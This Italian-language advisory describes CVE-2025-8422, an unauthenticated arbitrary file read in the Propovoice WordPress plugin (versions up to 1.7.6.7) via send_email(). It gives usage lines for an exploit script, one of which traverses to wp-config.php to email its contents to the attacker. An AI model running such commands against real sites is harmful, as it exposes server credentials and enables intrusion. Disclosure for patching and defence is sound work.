
Propovoice <= 1.7.6.7 - Lettura arbitraria di file senza autenticazione
Propovoice <= 1.7.6.7 - Lettura Arbitraria di File Non Autenticata
Il plugin Propovoice: All-in-One Client Management System per WordPress è vulnerabile alla Lettura Arbitraria di File in tutte le versioni fino alla 1.7.6.7 inclusa, tramite la funzione send_email(). Ciò consente a un attaccante non autenticato di leggere il contenuto di file arbitrari sul server, che possono contenere informazioni sensibili.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php